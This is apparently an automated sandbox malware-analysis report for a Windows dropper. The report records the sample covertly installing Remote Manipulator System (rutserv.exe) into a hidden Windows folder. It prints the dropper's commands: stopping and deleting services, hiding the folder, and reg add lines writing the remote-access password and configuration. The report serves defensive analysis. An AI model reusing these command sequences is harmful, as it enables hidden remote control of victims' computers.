Analysis
-
max time kernel
174s -
max time network
198s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
27-11-2022 01:30
Behavioral task
behavioral1
Sample
7405b46d5f93ea04e7ecd588ee4bd1de76579689e07986895bbbaeec4f2bf9e1.exe
Resource
win7-20220812-en
General
-
Target
7405b46d5f93ea04e7ecd588ee4bd1de76579689e07986895bbbaeec4f2bf9e1.exe
-
Size
4.1MB
-
MD5
5667aae6c34c2aed84dc344f2f7594ce
-
SHA1
858632f13d298ecb49c8b50bc3fd1e56c6b3ad33
-
SHA256
7405b46d5f93ea04e7ecd588ee4bd1de76579689e07986895bbbaeec4f2bf9e1
-
SHA512
bff05864a430f2abdc78991a322d0ea686c24d6fc60ec8ef71aa422e484ee40b19991ef4f3ce70a7d64567fb804de2b8e16c8d6a3d4246ebc4f51f00ccf9f78a
-
SSDEEP
98304:1joLchbHlbSEmlKVr8+loohgLijiAJdTvJbl:1Schk7u4+lJRhvJB
Malware Config
Signatures
-
Executes dropped EXE 6 IoCs
pid Process 1088 data.exe 872 rutserv.exe 1172 rutserv.exe 580 rutserv.exe 1716 rutserv.exe 1728 rfusclient.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 1488 attrib.exe -
Stops running service(s) 3 TTPs
-
resource yara_rule behavioral1/memory/912-55-0x0000000000400000-0x000000000042B000-memory.dmp upx behavioral1/memory/912-60-0x0000000000400000-0x000000000042B000-memory.dmp upx behavioral1/files/0x00070000000139f2-76.dat upx behavioral1/files/0x00070000000139e2-75.dat upx behavioral1/files/0x0006000000015c8c-83.dat upx behavioral1/files/0x0006000000015c8c-85.dat upx behavioral1/memory/872-88-0x0000000000400000-0x0000000000ABF000-memory.dmp upx behavioral1/memory/872-90-0x0000000000400000-0x0000000000ABF000-memory.dmp upx behavioral1/files/0x0006000000015c8c-91.dat upx behavioral1/files/0x0006000000015c8c-93.dat upx behavioral1/memory/1172-95-0x0000000000400000-0x0000000000ABF000-memory.dmp upx behavioral1/files/0x0006000000015c8c-103.dat upx behavioral1/files/0x0006000000015c8c-105.dat upx behavioral1/files/0x0006000000015c8c-107.dat upx behavioral1/files/0x0006000000015c62-114.dat upx behavioral1/files/0x0006000000015c62-115.dat upx behavioral1/files/0x0006000000015c62-117.dat upx behavioral1/files/0x0006000000015c62-119.dat upx behavioral1/memory/580-121-0x0000000000400000-0x0000000000ABF000-memory.dmp upx behavioral1/memory/1716-122-0x0000000000400000-0x0000000000ABF000-memory.dmp upx behavioral1/memory/580-124-0x0000000000400000-0x0000000000ABF000-memory.dmp upx behavioral1/memory/1728-125-0x0000000000400000-0x00000000009DD000-memory.dmp upx behavioral1/memory/1716-127-0x0000000000400000-0x0000000000ABF000-memory.dmp upx -
Deletes itself 1 IoCs
pid Process 1060 cmd.exe -
Loads dropped DLL 6 IoCs
pid Process 912 7405b46d5f93ea04e7ecd588ee4bd1de76579689e07986895bbbaeec4f2bf9e1.exe 2032 cmd.exe 2032 cmd.exe 2032 cmd.exe 1716 rutserv.exe 1716 rutserv.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA data.exe -
AutoIT Executable 4 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00080000000134d5-56.dat autoit_exe behavioral1/files/0x00080000000134d5-58.dat autoit_exe behavioral1/files/0x00080000000134d5-63.dat autoit_exe behavioral1/files/0x00070000000136c6-74.dat autoit_exe -
Drops file in Windows directory 64 IoCs
description ioc Process File created C:\Windows\spom\dd_vcredistMSI646D.txt cmd.exe File opened for modification C:\Windows\spom\dd_vcredistUI6411.txt cmd.exe File opened for modification C:\Windows\spom\java_install_reg.log cmd.exe File opened for modification C:\Windows\spom\lpksetup-20220812-142342-0.log cmd.exe File created C:\Windows\spom\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt cmd.exe File created C:\Windows\spom\691650e8-0ac2-4427-bb8b-74f96bcc3bfe.tmp cmd.exe File opened for modification C:\Windows\spom\hide.exe cmd.exe File opened for modification C:\Windows\spom\jawshtml.html cmd.exe File created C:\Windows\spom\lpksetup-20220812-142342-0.log cmd.exe File opened for modification C:\Windows\spom\RD5DA9.tmp cmd.exe File created C:\Windows\spom\wmsetup.log cmd.exe File opened for modification C:\Windows\spom\2e50ff76-65a6-4610-85c5-e45ac3507a87.tmp cmd.exe File opened for modification C:\Windows\spom\JavaDeployReg.log cmd.exe File created C:\Windows\spom\b6598b0d-3279-46de-9983-f8aeb432695b.tmp cmd.exe File opened for modification C:\Windows\spom\b6598b0d-3279-46de-9983-f8aeb432695b.tmp cmd.exe File created C:\Windows\spom\data.exe cmd.exe File created C:\Windows\spom\lpksetup-20220812-142921-0.log cmd.exe File created C:\Windows\spom\lpksetup-20220812-143500-0.log cmd.exe File created C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20220812_140938094-MSI_netfx_Full_x64.msi.txt cmd.exe File created C:\Windows\spom\RGIDBEE.tmp-tmp cmd.exe File created C:\Windows\spom\ASPNETSetup_00000.log cmd.exe File opened for modification C:\Windows\spom\vp8decoder.dll cmd.exe File created C:\Windows\spom\rutserv.exe cmd.exe File created C:\Windows\spom\SetupExe(20220812141637698).log cmd.exe File opened for modification C:\Windows\spom\uac.cmd cmd.exe File created C:\Windows\spom\vp8encoder.dll cmd.exe File opened for modification C:\Windows\spom\webmmux.dll cmd.exe File opened for modification C:\Windows\spom\ASPNETSetup_00000.log cmd.exe File opened for modification C:\Windows\spom\lpksetup-20220812-143204-0.log cmd.exe File opened for modification C:\Windows\spom\lpksetup-20220812-143500-0.log cmd.exe File opened for modification C:\Windows\spom attrib.exe File opened for modification C:\Windows\spom\dd_vcredistMSI646D.txt cmd.exe File opened for modification C:\Windows\spom\dd_wcf_CA_smci_20220812_140958_124.txt cmd.exe File opened for modification C:\Windows\spom\dd_wcf_CA_smci_20220812_140959_669.txt cmd.exe File created C:\Windows\spom\FXSAPIDebugLogFile.txt cmd.exe File opened for modification C:\Windows\spom\FXSAPIDebugLogFile.txt cmd.exe File created C:\Windows\spom\lpksetup-20220812-143204-0.log cmd.exe File created C:\Windows\spom\nouac.cmd cmd.exe File created C:\Windows\spom\1359bf3b-88ab-42dc-9aea-d113cc7ebfeb.tmp cmd.exe File opened for modification C:\Windows\spom\vp8encoder.dll cmd.exe File created C:\Windows\spom\dd_SetupUtility.txt cmd.exe File created C:\Windows\spom\dd_vcredistMSI6411.txt cmd.exe File created C:\Windows\spom\dd_wcf_CA_smci_20220812_140958_124.txt cmd.exe File created C:\Windows\spom\java_install_reg.log cmd.exe File opened for modification C:\Windows\spom\nouac.cmd cmd.exe File created C:\Windows\spom\uac.cmd cmd.exe File opened for modification C:\Windows\spom\wmsetup.log cmd.exe File opened for modification C:\Windows\spom\691650e8-0ac2-4427-bb8b-74f96bcc3bfe.tmp cmd.exe File created C:\Windows\spom\9ef13f25-47c1-4280-b22b-77b365dba3b0.tmp cmd.exe File opened for modification C:\Windows\spom\9ef13f25-47c1-4280-b22b-77b365dba3b0.tmp cmd.exe File opened for modification C:\Windows\spom\chrome_installer.log cmd.exe File created C:\Windows\spom\dd_vcredistUI646D.txt cmd.exe File opened for modification C:\Windows\spom\dd_vcredistUI646D.txt cmd.exe File created C:\Windows\spom\jusched.log cmd.exe File created C:\Windows\spom\ose00000.exe cmd.exe File opened for modification C:\Windows\spom\677b0ce9-010c-4ca0-8287-551e355fefd6.tmp cmd.exe File created C:\Windows\spom\RGIDBEE.tmp cmd.exe File opened for modification C:\Windows\spom\ASPNETSetup_00001.log cmd.exe File opened for modification C:\Windows\spom\data.exe cmd.exe File opened for modification C:\Windows\spom\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt cmd.exe File opened for modification C:\Windows\spom\jusched.log cmd.exe File opened for modification C:\Windows\spom\webmvorbisencoder.dll cmd.exe File opened for modification C:\Windows\spom\Admin.bmp cmd.exe File created C:\Windows\spom\jawshtml.html cmd.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 636 sc.exe 780 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 872 rutserv.exe 872 rutserv.exe 872 rutserv.exe 872 rutserv.exe 1172 rutserv.exe 1172 rutserv.exe 580 rutserv.exe 580 rutserv.exe 1716 rutserv.exe 1716 rutserv.exe 1716 rutserv.exe 1716 rutserv.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 872 rutserv.exe Token: SeDebugPrivilege 580 rutserv.exe Token: SeTakeOwnershipPrivilege 1716 rutserv.exe Token: SeTcbPrivilege 1716 rutserv.exe Token: SeTcbPrivilege 1716 rutserv.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 1088 data.exe 1088 data.exe 1088 data.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 1088 data.exe 1088 data.exe 1088 data.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 872 rutserv.exe 1172 rutserv.exe 580 rutserv.exe 1716 rutserv.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 912 wrote to memory of 1088 912 7405b46d5f93ea04e7ecd588ee4bd1de76579689e07986895bbbaeec4f2bf9e1.exe 27 PID 912 wrote to memory of 1088 912 7405b46d5f93ea04e7ecd588ee4bd1de76579689e07986895bbbaeec4f2bf9e1.exe 27 PID 912 wrote to memory of 1088 912 7405b46d5f93ea04e7ecd588ee4bd1de76579689e07986895bbbaeec4f2bf9e1.exe 27 PID 912 wrote to memory of 1088 912 7405b46d5f93ea04e7ecd588ee4bd1de76579689e07986895bbbaeec4f2bf9e1.exe 27 PID 912 wrote to memory of 1060 912 7405b46d5f93ea04e7ecd588ee4bd1de76579689e07986895bbbaeec4f2bf9e1.exe 28 PID 912 wrote to memory of 1060 912 7405b46d5f93ea04e7ecd588ee4bd1de76579689e07986895bbbaeec4f2bf9e1.exe 28 PID 912 wrote to memory of 1060 912 7405b46d5f93ea04e7ecd588ee4bd1de76579689e07986895bbbaeec4f2bf9e1.exe 28 PID 912 wrote to memory of 1060 912 7405b46d5f93ea04e7ecd588ee4bd1de76579689e07986895bbbaeec4f2bf9e1.exe 28 PID 1088 wrote to memory of 2032 1088 data.exe 30 PID 1088 wrote to memory of 2032 1088 data.exe 30 PID 1088 wrote to memory of 2032 1088 data.exe 30 PID 1088 wrote to memory of 2032 1088 data.exe 30 PID 2032 wrote to memory of 1404 2032 cmd.exe 32 PID 2032 wrote to memory of 1404 2032 cmd.exe 32 PID 2032 wrote to memory of 1404 2032 cmd.exe 32 PID 2032 wrote to memory of 1404 2032 cmd.exe 32 PID 1404 wrote to memory of 1496 1404 net.exe 33 PID 1404 wrote to memory of 1496 1404 net.exe 33 PID 1404 wrote to memory of 1496 1404 net.exe 33 PID 1404 wrote to memory of 1496 1404 net.exe 33 PID 2032 wrote to memory of 1692 2032 cmd.exe 34 PID 2032 wrote to memory of 1692 2032 cmd.exe 34 PID 2032 wrote to memory of 1692 2032 cmd.exe 34 PID 2032 wrote to memory of 1692 2032 cmd.exe 34 PID 1692 wrote to memory of 1296 1692 net.exe 35 PID 1692 wrote to memory of 1296 1692 net.exe 35 PID 1692 wrote to memory of 1296 1692 net.exe 35 PID 1692 wrote to memory of 1296 1692 net.exe 35 PID 2032 wrote to memory of 636 2032 cmd.exe 36 PID 2032 wrote to memory of 636 2032 cmd.exe 36 PID 2032 wrote to memory of 636 2032 cmd.exe 36 PID 2032 wrote to memory of 636 2032 cmd.exe 36 PID 2032 wrote to memory of 780 2032 cmd.exe 37 PID 2032 wrote to memory of 780 2032 cmd.exe 37 PID 2032 wrote to memory of 780 2032 cmd.exe 37 PID 2032 wrote to memory of 780 2032 cmd.exe 37 PID 2032 wrote to memory of 1568 2032 cmd.exe 38 PID 2032 wrote to memory of 1568 2032 cmd.exe 38 PID 2032 wrote to memory of 1568 2032 cmd.exe 38 PID 2032 wrote to memory of 1568 2032 cmd.exe 38 PID 2032 wrote to memory of 1488 2032 cmd.exe 39 PID 2032 wrote to memory of 1488 2032 cmd.exe 39 PID 2032 wrote to memory of 1488 2032 cmd.exe 39 PID 2032 wrote to memory of 1488 2032 cmd.exe 39 PID 2032 wrote to memory of 872 2032 cmd.exe 40 PID 2032 wrote to memory of 872 2032 cmd.exe 40 PID 2032 wrote to memory of 872 2032 cmd.exe 40 PID 2032 wrote to memory of 872 2032 cmd.exe 40 PID 2032 wrote to memory of 872 2032 cmd.exe 40 PID 2032 wrote to memory of 872 2032 cmd.exe 40 PID 2032 wrote to memory of 872 2032 cmd.exe 40 PID 2032 wrote to memory of 1172 2032 cmd.exe 41 PID 2032 wrote to memory of 1172 2032 cmd.exe 41 PID 2032 wrote to memory of 1172 2032 cmd.exe 41 PID 2032 wrote to memory of 1172 2032 cmd.exe 41 PID 2032 wrote to memory of 1172 2032 cmd.exe 41 PID 2032 wrote to memory of 1172 2032 cmd.exe 41 PID 2032 wrote to memory of 1172 2032 cmd.exe 41 PID 2032 wrote to memory of 1056 2032 cmd.exe 42 PID 2032 wrote to memory of 1056 2032 cmd.exe 42 PID 2032 wrote to memory of 1056 2032 cmd.exe 42 PID 2032 wrote to memory of 1056 2032 cmd.exe 42 PID 2032 wrote to memory of 1360 2032 cmd.exe 43 PID 2032 wrote to memory of 1360 2032 cmd.exe 43 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1488 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\7405b46d5f93ea04e7ecd588ee4bd1de76579689e07986895bbbaeec4f2bf9e1.exe"C:\Users\Admin\AppData\Local\Temp\7405b46d5f93ea04e7ecd588ee4bd1de76579689e07986895bbbaeec4f2bf9e1.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:912 -
C:\Users\Admin\AppData\Local\Temp\data.exe"C:\Users\Admin\AppData\Local\Temp\data.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Windows\SysWOW64\cmd.execmd /c nouac.cmd3⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\SysWOW64\net.exenet stop netaservice4⤵
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop netaservice5⤵PID:1496
-
-
-
C:\Windows\SysWOW64\net.exenet stop rmanservice4⤵
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop rmanservice5⤵PID:1296
-
-
-
C:\Windows\SysWOW64\sc.exesc delete netaservice4⤵
- Launches sc.exe
PID:636
-
-
C:\Windows\SysWOW64\sc.exesc delete rmanservice4⤵
- Launches sc.exe
PID:780
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SYSTEM\Remote Manipulator System" /f4⤵PID:1568
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Windows\spom"4⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:1488
-
-
C:\Windows\spom\rutserv.exe"rutserv.exe" /silentinstall4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:872
-
-
C:\Windows\spom\rutserv.exe"rutserv.exe" /firewall4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1172
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "notification" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e002000760065007200730069006f006e003d0022003600310030003000330022003e003c007500730065003e0074007200750065003c002f007500730065003e003c0065006d00610069006c003e006a006f0070007300300032004000790061006e006400650078002e00720075003c002f0065006d00610069006c003e003c00690064003e007b00380044003100390045003000300044002d0037003400420034002d0034004400430041002d0042003000410034002d003200430035003900310043004100460035003500410038007d003c002f00690064003e003c00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e00660061006c00730065003c002f00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e003c00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e00660061006c00730065003c002f00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e003c00730065006e0074003e00660061006c00730065003c002f00730065006e0074003e003c00760065007200730069006f006e003e00360031003000300033003c002f00760065007200730069006f006e003e003c007000750062006c00690063005f006b00650079005f006d003e003c002f007000750062006c00690063005f006b00650079005f006d003e003c007000750062006c00690063005f006b00650079005f0065003e003c002f007000750062006c00690063005f006b00650079005f0065003e003c00700061007300730077006f00720064003e003c002f00700061007300730077006f00720064003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c0064006900730063006c00610069006d00650072003e003c002f0064006900730063006c00610069006d00650072003e003c002f0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e003e000d000a004⤵PID:1056
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "UserAccess" /t REG_BINARY /d4⤵PID:1360
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Password" /t REG_BINARY /d 380039004400430041004600430035004600420039004500440042003800410038003700300034003500330036003900330033003500370037003400300038004400310037004100360035003900360034003900330038004600330041003400350034003800360032003700300031003100370046004200360033003900410037003500430043003100390044003600460034003800300030004600300037003200370039003700360042003700300043004200410038003400370037003900340039003000340036004500330034003600340036003500300043004300450041004100450038003900460041004300300035003900370046003900320034004⤵PID:1556
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "InternetId" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d00310036004c00450022003f003e000d000a003c0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073002000760065007200730069006f006e003d0022003600300030003000340022003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e00660061006c00730065003c002f007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e003c0069006e00650074005f007300650072007600650072003e003c002f0069006e00650074005f007300650072007600650072003e003c007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e00660061006c00730065003c002f007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e003c0069006e00650074005f00690064005f0070006f00720074003e0035003600350035003c002f0069006e00650074005f00690064005f0070006f00720074003e003c007500730065005f0069006e00650074005f00690064005f0069007000760036003e00660061006c00730065003c002f007500730065005f0069006e00650074005f00690064005f0069007000760036003e003c002f0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073003e000d000a004⤵PID:1992
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Options" /t REG_BINARY /d 545046301154524f4d5365727665724f7074696f6e7300095573654e5441757468080d53656375726974794c6576656c020304506f727403121614456e61626c654f7665726c617943617074757265080c53686f775472617949636f6e080642696e644950060d416e7920696e746572666163651343616c6c6261636b4175746f436f6e6e656374091743616c6c6261636b436f6e6e656374496e74657276616c023c084869646553746f70080c497046696c746572547970650202105573654c656761637943617074757265081750726f7465637443616c6c6261636b53657474696e6773081550726f74656374496e6574496453657474696e6773080f446f4e6f7443617074757265524450080755736549507636091141736b557365725065726d697373696f6e0816557365725065726d697373696f6e496e74657276616c031027134175746f416c6c6f775065726d697373696f6e08134e656564417574686f72697479536572766572081f41736b5065726d697373696f6e4f6e6c794966557365724c6f676765644f6e0811557365496e6574436f6e6e656374696f6e0813557365437573746f6d496e6574536572766572080a496e65744964506f727402000d557365496e6574496449507636081444697361626c6552656d6f7465436f6e74726f6c081344697361626c6552656d6f746553637265656e081344697361626c6546696c655472616e73666572080f44697361626c655265646972656374080d44697361626c6554656c6e6574081444697361626c6552656d6f746545786563757465081244697361626c655461736b4d616e61676572080e44697361626c654f7665726c6179080f44697361626c6553687574646f776e081444697361626c6552656d6f746555706772616465081544697361626c655072657669657743617074757265081444697361626c654465766963654d616e61676572080b44697361626c6543686174081344697361626c6553637265656e5265636f7264081044697361626c65415643617074757265081244697361626c6553656e644d657373616765080f44697361626c655265676973747279080d44697361626c65415643686174081544697361626c6552656d6f746553657474696e6773081544697361626c6552656d6f74655072696e74696e67080a44697361626c65526470080f4e6f7469667953686f7750616e656c08144e6f746966794368616e67655472617949636f6e08104e6f7469667942616c6c6f6e48696e74080f4e6f74696679506c6179536f756e64080c4e6f7469667950616e656c5802ff0c4e6f7469667950616e656c5902ff064c6f6755736508055369644964061034323030392e37343435313730303233084c6963656e73657306ae524d532d462d62366665664645334436363231346539363944333744396163653235423032366269593253326459586c52664477776e4932314758554a4544683945586d78785030594756304a5856513066506a6c74446c46564467594841514271664738645556554f446c5246446d42346667494e4841494341514a76594878704141734c4141734d486c516d63323952566b554f41677765557a773562513458576c564c623168654e434a740d50726f787953657474696e67731428010000efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d31364c45223f3e0d0a3c70726f78795f73657474696e67732076657273696f6e3d223630303034223e3c7573655f70726f78793e66616c73653c2f7573655f70726f78793e3c70726f78795f747970653e303c2f70726f78795f747970653e3c686f73743e3c2f686f73743e3c706f72743e383038303c2f706f72743e3c6e6565645f617574683e66616c73653c2f6e6565645f617574683e3c6e746d6c5f617574683e66616c73653c2f6e746d6c5f617574683e3c757365726e616d653e3c2f757365726e616d653e3c70617373776f72643e3c2f70617373776f72643e3c646f6d61696e3e3c2f646f6d61696e3e3c2f70726f78795f73657474696e67733e0d0a1144697361626c65496e7465726e65744964080b536166654d6f64655365740800004⤵PID:1972
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Windows\spom\rfusclient.exe"4⤵PID:1144
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "CalendarRecordSettings" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003600300030003000340022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a004⤵PID:1420
-
-
C:\Windows\spom\rutserv.exe"rutserv.exe" /start4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:580
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "2⤵
- Deletes itself
PID:1060
-
-
C:\Windows\spom\rutserv.exeC:\Windows\spom\rutserv.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1716 -
C:\Windows\spom\rfusclient.exeC:\Windows\spom\rfusclient.exe2⤵
- Executes dropped EXE
PID:1728
-
-
C:\Windows\spom\rfusclient.exeC:\Windows\spom\rfusclient.exe /tray2⤵PID:1108
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
300B
MD574e9d0e8925604864a7a58fb140a51b9
SHA1bbe1510e42b08cf99bda7a8572b55dd39d8f957e
SHA2563f1c0618f490d511359ffe19807a052413e9b9e1e4507e8cd67c97a422ea3a3a
SHA51272b0073fed4a43023cd47dfa86a7c0f43a73466d7ea6fa5a01075a98646b624d26f70143c7a589effe63efb8c479f361a6a5c7369fcffbe9a7c60fa96f7260fd
-
Filesize
840KB
MD52ec95cf9e9057f26663af7ec267fc05c
SHA1e05540a0c5992926e3759d2cd254b56dcbc7c0a1
SHA25662c388d65bad2c02fabbbc2736609c212c383b5e2c8fd20cb91f684c38ea8445
SHA512d6f2de5586c1c43c6a0d99d613382dc4bd2339ea64792077373de3541c16d2ef40237b75c538cf9680a3a69ec474356c8c659776ab21e4fbacbae660d09d2baa
-
Filesize
840KB
MD52ec95cf9e9057f26663af7ec267fc05c
SHA1e05540a0c5992926e3759d2cd254b56dcbc7c0a1
SHA25662c388d65bad2c02fabbbc2736609c212c383b5e2c8fd20cb91f684c38ea8445
SHA512d6f2de5586c1c43c6a0d99d613382dc4bd2339ea64792077373de3541c16d2ef40237b75c538cf9680a3a69ec474356c8c659776ab21e4fbacbae660d09d2baa
-
Filesize
840KB
MD55e6bd9aca16e20f70a167c1425a44623
SHA1a71234c6e9422e9869265045087825618e874d2d
SHA256e7596512a273e6a5c54952c98ff8f7a1aff4c61d36e6dc02f97735e7bbf5b154
SHA512d38a50d52cea88a32497ed2ac242308abef6740ecf603f7c1af16812901f32c94255da4586253a6feb07f9bffc20a26c2cc4dc580654601e5b29e4af488ef273
-
Filesize
10KB
MD5383dec4925ef46ea838ea39f26f9136a
SHA198b038bd3e5166d3a7775ab1a90f3c889d86f4df
SHA2565c0817a79b04099510fa5658311ff677531595ac44edbbf2e993f5afb5e0a3c1
SHA512ce8e2b3fe5867391906498ee2ba0fa99ffeedb291b75a9b2a45f968b795530c5f4bd6932b2f2c71e3fd308c8b977bb9bc234e5a6a7cfa582ebf88063726d92cb
-
Filesize
1.5MB
MD57dcf2fb7158409c2dc1213f5fbb0b110
SHA10f301369063870fc8304ea7f3c61e5a76fa2be81
SHA256dc23bcd7a6a2059709418bdc4bb72fa6e0360d311e7fb437885798129956db69
SHA512143d0cf890f473a34f3a6b111f6530bbb9ff35d41aae725092775f714af548720854e9506f0a92a404cf3019d85ba97524c93d929fdb8cf9438e6fb6e46891fa
-
Filesize
1.7MB
MD58880e0e1c9f1da077c912d4b1a0b9e4a
SHA14ef63d511168c377ab3b76424acae88f74fea174
SHA25612c9d41ea0cac3fd086632f005958ef50e86252d4d562c2d2fee9428aa4cfb99
SHA51281becd053723825442d0cddec0062f273a9222317c09779297e64f4272195ce236374a743c3bb147ac885af909dd0e26c2e5ca928fb37594bb14177e7ff51625
-
Filesize
10KB
MD525843073fca2de35e3e66ffac4b5b258
SHA1d190cd65796c62261e55fb6a5b606614e35473d1
SHA2564405c37fda1990152cba1387ecd51b834d2430905bb8a62fd9d303e9920c1220
SHA512828a3276e9cba8695245a0718f8b8196ef437b163def7b7d96e2b2d456ea3677e813a3c3262bb703ccf974e9add6425b2339911c4700c1423465c729827ea2ef
-
Filesize
127KB
MD5bda3c03c3e5d65922a311009e0ae8cd6
SHA137093c457ac5f01649b4d23a3d075a531af08baa
SHA25630dc5a63a43a00fb3bcacb696656dc302b9c090cf9c05df0f10123703ca07290
SHA512eab8356896f05952e1bdfca467e998b23e5a9a5e5245f13d201f9b87b7a450be628c3513a8a4c40fa50ffaa8491c4508f1215c57ac608dd3e5e67290a5bedc0b
-
Filesize
238KB
